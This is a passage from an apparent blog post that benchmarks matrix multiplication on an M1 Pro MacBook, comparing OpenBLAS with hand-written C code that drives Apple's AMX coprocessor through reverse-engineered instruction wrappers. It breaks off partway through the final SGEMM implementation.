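 * clock_ghz:        assumed clock frequency in GHz, supplied by the caller */
static double amx_peak_gflops(unsigned lanes, unsigned cycles_per_instr, double clock_ghz)
{
    assert(lanes > 0 && cycles_per_instr > 0 && clock_ghz > 0.0);
    double flops_per_instr = 2.0 * (double)lanes * (double)lanes; /* multiply + add */
    return flops_per_instr / (double)cycles_per_instr * clock_ghz;
}
```

<p>For example, with a purely assumed 3.2 GHz clock, <code>amx_peak_gflops(16, 1, 3.2)</code> gives roughly 1638 GFLOP/s for FMA32 on the performance variant. Treat that as an upper bound under the stated assumptions, not a measurement.</p>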
<p>To achieve 1-cycle throughput from a single core, destinations must be independent (using a Z offset). Operations utilizing too much of the Z register will experience lower throughput. Throughput can be improved by distributing operations across different cores, thus leveraging entirely different Z registers.</p>
<h1 id="heading-performance-characteristics">Performance Characteristics</h1>
<p>We can compare the performance of SIMD operations on Arm NEON and Apple’s AMX by testing a few different strategies: first using OpenBLAS, then using Apple AMX directly, and finally through the official route, Apple’s Accelerate library. These tests were run on a 14-inch MacBook Pro with the M1 Pro chip and 16 GB of RAM.</p>
<h3 id="heading-openblas-arm-neon-performance">OpenBLAS (Arm NEON) Performance</h3>
<p>For a baseline comparison we can use OpenBLAS, an open-source implementation of the BLAS and LAPACK APIs with many optimizations for specific processor types, including Arm NEON and SVE (of note, Apple Silicon up to the M3 doesn’t support the Arm SVE ISA, as it is still on the ARMv8 ISA).</p>
<pre><code class="lang-c"><span class="hljs-meta">#<span class="hljs-meta-keyword">pragma</span> once</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;cblas.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;vector&gt;</span></span>
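<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;algorithm&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;type_traits&gt;</span></span>

<span class="hljs-comment">// GEMM&lt;T&gt; is assumed to be the benchmark harness's abstract base class (not shown here).</span>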
<span class="hljs-keyword">template</span> &lt;<span class="hljs-keyword">typename</span> T&gt;
<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">OpenBLASGEMM</span> :</span> <span class="hljs-keyword">public</span> GEMM&lt;T&gt;
{
<span class="hljs-keyword">private</span>:
    <span class="hljs-keyword">size_t</span> n;
    <span class="hljs-built_in">std</span>::<span class="hljs-built_in">vector</span>&lt;T&gt; a, b, c;

<span class="hljs-keyword">public</span>:
    <span class="hljs-function"><span class="hljs-keyword">explicit</span> <span class="hljs-title">OpenBLASGEMM</span><span class="hljs-params">(<span class="hljs-keyword">size_t</span> n)</span> : <span class="hljs-title">n</span><span class="hljs-params">(n)</span>, <span class="hljs-title">a</span><span class="hljs-params">(n * n)</span>, <span class="hljs-title">b</span><span class="hljs-params">(n * n)</span>, <span class="hljs-title">c</span><span class="hljs-params">(n * n)</span> </span>{}

    <span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">run</span><span class="hljs-params">()</span> <span class="hljs-keyword">override</span>
    </span>{
        <span class="hljs-function"><span class="hljs-keyword">if</span> <span class="hljs-title">constexpr</span> <span class="hljs-params">(<span class="hljs-built_in">std</span>::is_same_v&lt;T, <span class="hljs-keyword">float</span>&gt;)</span> </span>{
            cblas_sgemm(CblasRowMajor, CblasNoTrans, CblasNoTrans, n, n, n, <span class="hljs-number">1.0f</span>,
                        a.data(), n, b.data(), n, <span class="hljs-number">0.0f</span>, c.data(), n);
        } <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> <span class="hljs-keyword">constexpr</span> (<span class="hljs-built_in">std</span>::is_same_v&lt;T, <span class="hljs-keyword">double</span>&gt;) {
            cblas_dgemm(CblasRowMajor, CblasNoTrans, CblasNoTrans, n, n, n, <span class="hljs-number">1.0</span>,
                        a.data(), n, b.data(), n, <span class="hljs-number">0.0</span>, c.data(), n);
        }
    }

    <span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">init_matrices</span><span class="hljs-params">()</span> <span class="hljs-keyword">override</span>
    </span>{
        <span class="hljs-built_in">std</span>::fill(a.begin(), a.end(), T(<span class="hljs-number">1</span>));
        <span class="hljs-built_in">std</span>::fill(b.begin(), b.end(), T(<span class="hljs-number">1</span>));
        <span class="hljs-built_in">std</span>::fill(c.begin(), c.end(), T(<span class="hljs-number">0</span>));
    }
};
</code></pre>
<div class="hn-table">
<table>
<thead>
<tr>
<td>N</td><td>GFLOP/s</td><td>mean runtime (s)</td><td>min runtime (s)</td><td>max runtime (s)</td></tr>
</thead>
<tbody>
<tr>
<td>64</td><td>79.643</td><td>0.00001</td><td>0.00001</td><td>0.00001</td></tr>
<tr>
<td>128</td><td>63.995</td><td>0.00040</td><td>0.00007</td><td>0.00599</td></tr>
<tr>
<td>256</td><td>212.650</td><td>0.00087</td><td>0.00016</td><td>0.00705</td></tr>
<tr>
<td>512</td><td>371.408</td><td>0.00087</td><td>0.00072</td><td>0.00130</td></tr>
<tr>
<td>1024</td><td>423.668</td><td>0.00759</td><td>0.00507</td><td>0.02126</td></tr>
<tr>
<td>2048</td><td>448.801</td><td>0.04301</td><td>0.03828</td><td>0.04739</td></tr>
<tr>
<td>4096</td><td>570.152</td><td>0.27678</td><td>0.24106</td><td>0.32018</td></tr>
<tr>
<td>8192</td><td>574.347</td><td>2.22609</td><td>1.91437</td><td>2.91120</td></tr>
</tbody>
</table>
</div><p>OpenBLAS demonstrates varying performance characteristics across different matrix dimensions. For compact matrices, specifically at N=64, OpenBLAS achieves 79.6 GFLOP/s. Throughput dips to 64.0 GFLOP/s at N=128, then climbs to 212.7 GFLOP/s at N=256 and 371 GFLOP/s at N=512. Run times for these smaller matrices, while brief, become noticeably more variable starting from N=128, where the slowest run (5.99 ms) is far above the fastest (0.07 ms). As matrix dimensions grow, throughput keeps improving: at N=1024, OpenBLAS reaches 423.7 GFLOP/s.</p>
<p>The performance characteristics of OpenBLAS undergo further changes as matrix sizes grow beyond N=1024. In this range, the library exhibits longer response times, with this trend becoming particularly pronounced for large matrices such as N=4096 and N=8192. At these dimensions, OpenBLAS's mean response times increase significantly. The largest tested matrix size, N=8192, sees OpenBLAS achieving 574 GFLOP/s, but comes at the cost of increased computational time, with mean response times surpassing 2.2 seconds.</p>
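<p>For reference, the GFLOP/s column can be reproduced from N and a runtime using the usual 2·N³ operation count for a square GEMM. The numbers in the table line up with the minimum runtime rather than the mean; that is an inference from the figures, since the benchmark harness itself is not shown. The helper name is made up for this sketch.</p>

```c
#include <assert.h>

/* An N x N x N GEMM performs N^3 multiply-adds, i.e. 2 * N^3 floating-point
 * operations. Dividing by the runtime in seconds gives FLOP/s. */
static double gemm_gflops(unsigned n, double seconds)
{
    assert(seconds > 0.0);
    double flops = 2.0 * (double)n * (double)n * (double)n;
    return flops / seconds / 1e9;
}
```

<p>Plugging in N=8192 with the 1.91437 s minimum runtime gives about 574.3 GFLOP/s, and N=4096 with 0.24106 s gives about 570.1 GFLOP/s, both matching the table to within rounding.</p>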
<h3 id="heading-rawdogging-apple-amx">Rawdogging Apple AMX</h3>
<p>Now for something more exotic: we interact with Apple AMX directly through a header file built by <a target="_blank" href="https://gist.github.com/dougallj/7cba721da1a94da725ee37c1e9cd1f21">Dougall Johnson</a>. We’re going to have to call a lot of AMX instructions through this wrapper.</p>
<p>We begin by making a microkernel with a 32x32 tile of the output matrix C, leveraging the AMX's ability to work with large data blocks efficiently. This loop loads four 16x32 blocks of C into the Z registers. The <code>i &lt;&lt; 2</code> in the offset argument selects different groups of Z registers for each block, effectively utilizing the full 64 Z registers available in the AMX.</p>
<pre><code class="lang-c"><span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">4</span>; i++) {
    amx_ldz((<span class="hljs-keyword">uint8_t</span> *)(C + i * <span class="hljs-number">16</span> * ldc), i &lt;&lt; <span class="hljs-number">2</span>, <span class="hljs-number">1</span>);
}
</code></pre>
<p>The main computation loop iterates over the K dimension, loading a column of A and a row of B in each iteration. These instructions load 32 elements from A into a Y register and 32 elements from B into an X register. The AMX can then perform an outer product of these vectors, accumulating the result into the Z registers.</p>
<pre><code class="lang-c">amx_ldy((<span class="hljs-keyword">uint8_t</span> *)(A + k), <span class="hljs-number">0</span>, <span class="hljs-number">1</span>);
amx_ldx((<span class="hljs-keyword">uint8_t</span> *)(B + k * ldb), <span class="hljs-number">0</span>, <span class="hljs-number">1</span>);
</code></pre>
<p>Next, a nested loop performs four FMA32 operations, each computing a 16x16 block of the 32x32 output tile. The arguments to <code>amx_fma32</code> select different portions of the X and Y registers and different groups of Z registers for each operation.</p>
<pre><code class="lang-c"><span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">2</span>; i++) {
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> j = <span class="hljs-number">0</span>; j &lt; <span class="hljs-number">2</span>; j++) {
        amx_fma32(j, i, i * <span class="hljs-number">2</span> + j, <span class="hljs-number">0</span>);
    }
}
</code></pre>
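<p>If the AMX calls are hard to follow, a scalar model of the same micro-kernel may help. The sketch assumes A is packed so that <code>a[k * 32 + r]</code> holds row r of the tile for step k (the layout produced by <code>pack_matrix_a</code>), that B is packed the same way by column, and that block (i, j) of the output corresponds to Z group <code>i * 2 + j</code>. The function name and these mappings are assumptions made for illustration.</p>

```c
#include <assert.h>
#include <stddef.h>

#define TILE 32 /* output tile edge */
#define HALF 16 /* f32 lanes covered by one FMA32 */

/* Scalar model of the micro-kernel: for each k, take 32 values of A (the "Y"
 * side) and 32 values of B (the "X" side) and accumulate their outer product
 * into the 32x32 tile c as four 16x16 blocks. */
static void micro_kernel_model(float c[TILE][TILE], const float *a,
                               const float *b, size_t kc)
{
    assert(a != NULL && b != NULL);
    for (size_t k = 0; k < kc; k++) {
        const float *y = a + k * TILE; /* 32 rows of the A panel at step k */
        const float *x = b + k * TILE; /* 32 columns of the B panel at step k */
        for (size_t i = 0; i < 2; i++) {     /* which half of Y */
            for (size_t j = 0; j < 2; j++) { /* which half of X */
                /* block (i, j) plays the role of Z group i * 2 + j */
                for (size_t r = 0; r < HALF; r++) {
                    for (size_t col = 0; col < HALF; col++) {
                        c[i * HALF + r][j * HALF + col] +=
                            y[i * HALF + r] * x[j * HALF + col];
                    }
                }
            }
        }
    }
}
```

<p>A model like this is also a convenient oracle: run it next to the AMX kernel on small inputs and compare the tiles.</p>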
<p>To maximize performance, we can further create matrix packing strategies to rearrange the input matrices into a more cache-friendly layout. We can do this by packing 32-element column segments of A into contiguous memory, improving spatial locality and reducing cache misses during the micro-kernel execution.</p>
<pre><code class="lang-c"><span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">pack_matrix_a</span><span class="hljs-params">(<span class="hljs-keyword">float</span> *dest, <span class="hljs-keyword">const</span> <span class="hljs-keyword">float</span> *src, <span class="hljs-keyword">uint64_t</span> M, <span class="hljs-keyword">uint64_t</span> K, <span class="hljs-keyword">uint64_t</span> lda)</span> </span>{
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> i = <span class="hljs-number">0</span>; i &lt; M; i += <span class="hljs-number">32</span>) {
        <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> k = <span class="hljs-number">0</span>; k &lt; K; k++) {
            <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> ii = <span class="hljs-number">0</span>; ii &lt; <span class="hljs-number">32</span> &amp;&amp; i + ii &lt; M; ii++) {
                dest[k * <span class="hljs-number">32</span> + ii] = src[(i + ii) * lda + k];
            }
        }
        dest += K * <span class="hljs-number">32</span>;
    }
}
</code></pre>
<p>The main <code>amx_sgemm</code> function orchestrates the overall computation, employing a cache blocking strategy to optimize performance. It defines block sizes MC, KC, and NC (all set to 384 in this implementation) to ensure that the working set fits within the processor's cache hierarchy. The function allocates aligned memory for packed versions of A and B, ensuring optimal memory access patterns for the AMX instructions.</p>
<pre><code class="lang-c"><span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">amx_sgemm</span><span class="hljs-params">(<span class="hljs-keyword">float</span> *A, <span class="hljs-keyword">float</span> *B, <span class="hljs-keyword">float</span> *C, <span class="hljs-keyword">const</span> <span class="hljs-keyword">uint64_t</span> size)</span> </span>{
    <span class="hljs-keyword">const</span> <span class="hljs-keyword">uint64_t</span> M = size, N = size, K = size;
    <span class="hljs-keyword">const</span> <span class="hljs-keyword">uint64_t</span> MC = <span class="hljs-number">384</span>, KC = <span class="hljs-number">384</span>, NC = <span class="hljs-number">384</span>;  <span class="hljs-comment">// Cache blocking parameters</span>

    <span class="hljs-keyword">float</span> *packed_A = (<span class="hljs-keyword">float</span> *)aligned_alloc(<span class="hljs-number">64</span>, MC * KC * <span class="hljs-keyword">sizeof</span>(<span class="hljs-keyword">float</span>));
    <span class="hljs-keyword">float</span> *packed_B = (<span class="hljs-keyword">float</span> *)aligned_alloc(<span class="hljs-number">64</span>, KC * NC * <span class="hljs-keyword">sizeof</span>(<span class="hljs-keyword">float</span>));
</code></pre>
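<p>One detail worth keeping in mind: C11's <code>aligned_alloc</code> expects the size to be a multiple of the alignment. With 384 x 384 floats that is 589,824 bytes, which divides evenly by 64, so the calls above are fine, but other block sizes may not be. A small helper, with hypothetical names, that rounds the size up first:</p>

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

/* Round `bytes` up to the next multiple of `align` (a power of two). */
static size_t round_up(size_t bytes, size_t align)
{
    assert(align != 0 && (align & (align - 1)) == 0);
    return (bytes + align - 1) & ~(align - 1);
}

/* Allocate a 64-byte-aligned rows x cols float panel.
 * Returns NULL on failure; release with free(). */
static float *alloc_panel(size_t rows, size_t cols)
{
    size_t bytes = round_up(rows * cols * sizeof(float), 64);
    return (float *)aligned_alloc(64, bytes);
}
```

<p>Each 384 x 384 panel is 576 KiB, so the packed A and B buffers together take a little over 1 MiB.</p>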
<p>The computation is then structured as nested loops over blocks of the matrices, with the innermost loop invoking the micro-kernel.</p>
<pre><code class="lang-c"><span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> mc = <span class="hljs-number">0</span>; mc &lt; M; mc += MC) {
    <span class="hljs-keyword">uint64_t</span> mc_end = MIN(mc + MC, M);
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> nc = <span class="hljs-number">0</span>; nc &lt; N; nc += NC) {
        <span class="hljs-keyword">uint64_t</span> nc_end = MIN(nc + NC, N);

        <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> kc = <span class="hljs-number">0</span>; kc &lt; K; kc += KC) {
            <span class="hljs-keyword">uint64_t</span> kc_end = MIN(kc + KC, K);

            <span class="hljs-comment">// Pack only the current KC x NC panel of B: packed_B holds KC * NC floats</span>
            pack_matrix_b(packed_B, B + kc * N + nc, kc_end - kc, nc_end - nc, N);

            <span class="hljs-comment">// Pack A panel</span>
            pack_matrix_a(packed_A, A + mc * K + kc, mc_end - mc, kc_end - kc, K);

            <span class="hljs-comment">// Micro-kernel calls</span>
            <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> m = <span class="hljs-number">0</span>; m &lt; mc_end - mc; m += <span class="hljs-number">32</span>) {
                <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> n = <span class="hljs-number">0</span>; n &lt; nc_end - nc; n += <span class="hljs-number">32</span>) {
                    amx_gemm_micro_kernel(
                        packed_A + m * (kc_end - kc),
                        packed_B + n * (kc_end - kc),
                        C + (mc + m) * N + (nc + n),
                        kc_end - kc, <span class="hljs-number">32</span>, <span class="hljs-number">32</span>, N
                    );
                }
            }
        }
    }
}
</code></pre>
<p>Finally we arrive at the final implementation.</p>
<pre><code class="lang-c"><span class="hljs-meta">#<span class="hljs-meta-keyword">pragma</span> once</span>

<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;stdint.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;stdlib.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;string.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">"amx.h"</span></span>

<span class="hljs-comment">// AMX wrapper functions</span>
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> <span class="hljs-keyword">void</span> <span class="hljs-title">amx_ldz</span><span class="hljs-params">(<span class="hljs-keyword">const</span> <span class="hljs-keyword">uint8_t</span> *addr, <span class="hljs-keyword">uint64_t</span> offset, <span class="hljs-keyword">uint64_t</span> mode)</span>
</span>{
    AMX_LDZ(((mode &amp; <span class="hljs-number">1u</span>ll) &lt;&lt; <span class="hljs-number">62</span>) |
            ((offset &amp; ((<span class="hljs-number">1u</span>ll &lt;&lt; <span class="hljs-number">6</span>) - <span class="hljs-number">1</span>)) &lt;&lt; <span class="hljs-number">56</span>) |
            (((<span class="hljs-keyword">uint64_t</span>)addr &amp; ((<span class="hljs-number">1u</span>ll &lt;&lt; <span class="hljs-number">56</span>) - <span class="hljs-number">1</span>))));
}

<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> <span class="hljs-keyword">void</span> <span class="hljs-title">amx_stz</span><span class="hljs-params">(<span class="hljs-keyword">uint8_t</span> *addr, <span class="hljs-keyword">uint64_t</span> offset, <span class="hljs-keyword">uint64_t</span> mode)</span>
</span>{
    AMX_STZ(((mode &amp; <span class="hljs-number">1u</span>ll) &lt;&lt; <span class="hljs-number">62</span>) |
            ((offset &amp; ((<span class="hljs-number">1u</span>ll &lt;&lt; <span class="hljs-number">6</span>) - <span class="hljs-number">1</span>)) &lt;&lt; <span class="hljs-number">56</span>) |
            (((<span class="hljs-keyword">uint64_t</span>)addr &amp; ((<span class="hljs-number">1u</span>ll &lt;&lt; <span class="hljs-number">56</span>) - <span class="hljs-number">1</span>))));
}

<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> <span class="hljs-keyword">void</span> <span class="hljs-title">amx_ldx</span><span class="hljs-params">(<span class="hljs-keyword">uint8_t</span> *addr, <span class="hljs-keyword">uint64_t</span> offset, <span class="hljs-keyword">uint64_t</span> mode)</span>
</span>{
    AMX_LDX(((mode &amp; <span class="hljs-number">1u</span>ll) &lt;&lt; <span class="hljs-number">62</span>) |
            ((offset &amp; ((<span class="hljs-number">1u</span>ll &lt;&lt; <span class="hljs-number">3</span>) - <span class="hljs-number">1</span>)) &lt;&lt; <span class="hljs-number">56</span>) |
            (((<span class="hljs-keyword">uint64_t</span>)addr &amp; ((<span class="hljs-number">1u</span>ll &lt;&lt; <span class="hljs-number">56</span>) - <span class="hljs-number">1</span>))));
}

<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> <span class="hljs-keyword">void</span> <span class="hljs-title">amx_ldy</span><span class="hljs-params">(<span class="hljs-keyword">uint8_t</span> *addr, <span class="hljs-keyword">uint64_t</span> offset, <span class="hljs-keyword">uint64_t</span> mode)</span>
</span>{
    AMX_LDY(((mode &amp; <span class="hljs-number">1u</span>ll) &lt;&lt; <span class="hljs-number">62</span>) |
            ((offset &amp; ((<span class="hljs-number">1u</span>ll &lt;&lt; <span class="hljs-number">3</span>) - <span class="hljs-number">1</span>)) &lt;&lt; <span class="hljs-number">56</span>) |
            (((<span class="hljs-keyword">uint64_t</span>)addr &amp; ((<span class="hljs-number">1u</span>ll &lt;&lt; <span class="hljs-number">56</span>) - <span class="hljs-number">1</span>))));
}

<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> <span class="hljs-keyword">void</span> <span class="hljs-title">amx_stx</span><span class="hljs-params">(<span class="hljs-keyword">uint8_t</span> *addr, <span class="hljs-keyword">uint64_t</span> offset, <span class="hljs-keyword">uint64_t</span> mode)</span>
</span>{
    AMX_STX(((mode &amp; <span class="hljs-number">1u</span>ll) &lt;&lt; <span class="hljs-number">62</span>) |
            ((offset &amp; ((<span class="hljs-number">1u</span>ll &lt;&lt; <span class="hljs-number">3</span>) - <span class="hljs-number">1</span>)) &lt;&lt; <span class="hljs-number">56</span>) |
            (((<span class="hljs-keyword">uint64_t</span>)addr &amp; ((<span class="hljs-number">1u</span>ll &lt;&lt; <span class="hljs-number">56</span>) - <span class="hljs-number">1</span>))));
}

<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> <span class="hljs-keyword">void</span> <span class="hljs-title">amx_sty</span><span class="hljs-params">(<span class="hljs-keyword">uint8_t</span> *addr, <span class="hljs-keyword">uint64_t</span> offset, <span class="hljs-keyword">uint64_t</span> mode)</span>
</span>{
    AMX_STY(((mode &amp; <span class="hljs-number">1u</span>ll) &lt;&lt; <span class="hljs-number">62</span>) |
            ((offset &amp; ((<span class="hljs-number">1u</span>ll &lt;&lt; <span class="hljs-number">3</span>) - <span class="hljs-number">1</span>)) &lt;&lt; <span class="hljs-number">56</span>) |
            (((<span class="hljs-keyword">uint64_t</span>)addr &amp; ((<span class="hljs-number">1u</span>ll &lt;&lt; <span class="hljs-number">56</span>) - <span class="hljs-number">1</span>))));
}

<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> <span class="hljs-keyword">void</span> <span class="hljs-title">amx_fma32</span><span class="hljs-params">(<span class="hljs-keyword">uint64_t</span> xoffset, <span class="hljs-keyword">uint64_t</span> yoffset, <span class="hljs-keyword">uint64_t</span> zoffset, <span class="hljs-keyword">uint64_t</span> zignore)</span>
</span>{
    AMX_FMA32((yoffset &lt;&lt; <span class="hljs-number">6</span>) |
              (xoffset &lt;&lt; <span class="hljs-number">6</span> &lt;&lt; <span class="hljs-number">10</span>) |
              (zoffset &lt;&lt; <span class="hljs-number">20</span>) |
              (zignore &lt;&lt; <span class="hljs-number">27</span>));
}

<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> MIN(a,b) ((a) &lt; (b) ? (a) : (b))</span>

<span class="hljs-comment">// Micro-kernel for 32x32 tiles</span>
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">amx_gemm_micro_kernel</span><span class="hljs-params">(<span class="hljs-keyword">const</span> <span class="hljs-keyword">float</span> *A, <span class="hljs-keyword">const</span> <span class="hljs-keyword">float</span> *B, <span class="hljs-keyword">float</span> *C, 
                                  <span class="hljs-keyword">uint64_t</span> K, <span class="hljs-keyword">uint64_t</span> lda, <span class="hljs-keyword">uint64_t</span> ldb, <span class="hljs-keyword">uint64_t</span> ldc)</span> </span>{
    <span class="hljs-comment">// Load C tile</span>
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">4</span>; i++) {
        amx_ldz((<span class="hljs-keyword">uint8_t</span> *)(C + i * <span class="hljs-number">16</span> * ldc), i &lt;&lt; <span class="hljs-number">2</span>, <span class="hljs-number">1</span>);
    }

    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> k = <span class="hljs-number">0</span>; k &lt; K; k++) {
        <span class="hljs-comment">// Load A column (32x1); packed A stores column k at offset k * lda</span>
        amx_ldy((<span class="hljs-keyword">uint8_t</span> *)(A + k * lda), <span class="hljs-number">0</span>, <span class="hljs-number">1</span>);

        <span class="hljs-comment">// Load B row (1x32)</span>
        amx_ldx((<span class="hljs-keyword">uint8_t</span> *)(B + k * ldb), <span class="hljs-number">0</span>, <span class="hljs-number">1</span>);

        <span class="hljs-comment">// Perform FMA for 32x32 tile</span>
        <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">2</span>; i++) {
            <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> j = <span class="hljs-number">0</span>; j &lt; <span class="hljs-number">2</span>; j++) {
                amx_fma32(j, i, i * <span class="hljs-number">2</span> + j, <span class="hljs-number">0</span>);
            }
        }
    }

    <span class="hljs-comment">// Store C tile</span>
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">4</span>; i++) {
        amx_stz((<span class="hljs-keyword">uint8_t</span> *)(C + i * <span class="hljs-number">16</span> * ldc), i &lt;&lt; <span class="hljs-number">2</span>, <span class="hljs-number">1</span>);
    }
}

<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">pack_matrix_a</span><span class="hljs-params">(<span class="hljs-keyword">float</span> *dest, <span class="hljs-keyword">const</span> <span class="hljs-keyword">float</span> *src, <span class="hljs-keyword">uint64_t</span> M, <span class="hljs-keyword">uint64_t</span> K, <span class="hljs-keyword">uint64_t</span> lda)</span> </span>{
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> i = <span class="hljs-number">0</span>; i &lt; M; i += <span class="hljs-number">32</span>) {
        <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> k = <span class="hljs-number">0</span>; k &lt; K; k++) {
            <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> ii = <span class="hljs-number">0</span>; ii &lt; <span class="hljs-number">32</span> &amp;&amp; i + ii &lt; M; ii++) {
                dest[k * <span class="hljs-number">32</span> + ii] = src[(i + ii) * lda + k];
            }
        }
        dest += K * <span class="hljs-number">32</span>;
    }
}

<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">pack_matrix_b</span><span class="hljs-params">(<span class="hljs-keyword">float</span> *dest, <span class="hljs-keyword">const</span> <span class="hljs-keyword">float</span> *src, <span class="hljs-keyword">uint64_t</span> K, <span class="hljs-keyword">uint64_t</span> N, <span class="hljs-keyword">uint64_t</span> ldb)</span> </span>{
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> j = <span class="hljs-number">0</span>; j &lt; N; j += <span class="hljs-number">32</span>) {
        <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> k = <span class="hljs-number">0</span>; k &lt; K; k++) {
            <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> jj = <span class="hljs-number">0</span>; jj &lt; <span class="hljs-number">32</span> &amp;&amp; j + jj &lt; N; jj++) {
                dest[k * <span class="hljs-number">32</span> + jj] = src[k * ldb + (j + jj)];
            }
        }
        dest += K * <span class="hljs-number">32</span>;
    }
}

<span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">amx_sgemm</span><span class="hljs-params">(<span class="hljs-keyword">float</span> *A, <span class="hljs-keyword">float</span> *B, <span class="hljs-keyword">float</span> *C, <span class="hljs-keyword">const</span> <span class="hljs-keyword">uint64_t</span> size)</span> </span>{
    <span class="hljs-keyword">const</span> <span class="hljs-keyword">uint64_t</span> M = size, N = size, K = size;
    <span class="hljs-keyword">const</span> <span class="hljs-keyword">uint64_t</span> MC = <span class="hljs-number">384</span>, KC = <span class="hljs-number">384</span>, NC = <span class="hljs-number">384</span>;  <span class="hljs-comment">// Cache blocking parameters</span>

    <span class="hljs-comment">// Allocate packed buffers</span>
    <span class="hljs-keyword">float</span> *packed_A = (<span class="hljs-keyword">float</span> *)aligned_alloc(<span class="hljs-number">64</span>, MC * KC * <span class="hljs-keyword">sizeof</span>(<span class="hljs-keyword">float</span>));
    <span class="hljs-keyword">float</span> *packed_B = (<span class="hljs-keyword">float</span> *)aligned_alloc(<span class="hljs-number">64</span>, KC * NC * <span class="hljs-keyword">sizeof</span>(<span class="hljs-keyword">float</span>));

    <span class="hljs-keyword">if</span> (!packed_A || !packed_B) {
        <span class="hljs-built_in">free</span>(packed_A);
        <span class="hljs-built_in">free</span>(packed_B);
        <span class="hljs-keyword">return</span>;
    }

    AMX_START();

    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> mc = <span class="hljs-number">0</span>; mc &lt; M; mc += MC) {
        <span class="hljs-keyword">uint64_t</span> mc_end = MIN(mc + MC, M);
        <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> nc = <span class="hljs-number">0</span>; nc &lt; N; nc += NC) {
            <span class="hljs-keyword">uint64_t</span> nc_end = MIN(nc + NC, N);

            <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> kc = <span class="hljs-number">0</span>; kc &lt; K; kc += KC) {
                <span class="hljs-keyword">uint64_t</span> kc_end = MIN(kc + KC, K);

                <span class="hljs-comment">// Pack B panel: only rows kc..kc_end, so it fits the KC x NC buffer</span>
                pack_matrix_b(packed_B, B + kc * N + nc, kc_end - kc, nc_end - nc, N);

                <span class="hljs-comment">// Pack A panel</span>
                pack_matrix_a(packed_A, A + mc * K + kc, mc_end - mc, kc_end - kc, K);

                <span class="hljs-comment">// Micro-kernel calls</span>
                <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> m = <span class="hljs-number">0</span>; m &lt; mc_end - mc; m += <span class="hljs-number">32</span>) {
                    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint64_t</span> n = <span class="hljs-number">0</span>; n &lt; nc_end - nc; n += <span class="hljs-number">32</span>) {
                        amx_gemm_micro_kernel(
                            packed_A + m * (kc_end - kc),
                            packed_B + n * (kc_end - kc),
                            C + (mc + m) * N + (nc + n),
